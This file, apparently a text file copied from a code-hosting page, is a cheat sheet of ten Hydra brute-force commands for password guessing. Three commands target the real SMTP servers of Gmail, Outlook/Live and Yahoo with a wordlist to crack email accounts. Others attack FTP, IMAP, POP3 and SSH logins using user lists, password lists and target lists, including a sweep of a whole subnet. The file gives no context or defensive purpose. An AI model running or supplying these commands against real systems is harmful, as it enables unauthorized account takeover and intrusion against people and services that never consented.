11 lines
684 B
Text
11 lines
684 B
Text
|
hydra -l user -x 3:3:a ftp://192.168.43.1
|
|||
|
hydra –S –l Email –P /root/Desktop/Wordlist.txt –e ns –V –s 465 smtp.gmail.com smtp
|
|||
|
hydra –S –l Email –P /root/Desktop/Wordlist.txt –e ns –V –s 587 smtp.live.com smtp
|
|||
|
hydra –S –l Email –P /root/Desktop/Wordlist.txt –e ns –V –s 587 smtp.mail.yahoo.com smtp
|
|||
|
hydra -t 1 -l admin -P /root/Desktop/password.lst -vV 192.168.1.1 ftp
|
|||
|
hydra -l user -P passlist.txt ftp://192.168.0.1
|
|||
|
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
|
|||
|
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
|
|||
|
hydra -l admin -p password ftp://[192.168.0.0/24]/
|
|||
|
hydra -L logins.txt -P pws.txt -M targets.txt ssh
|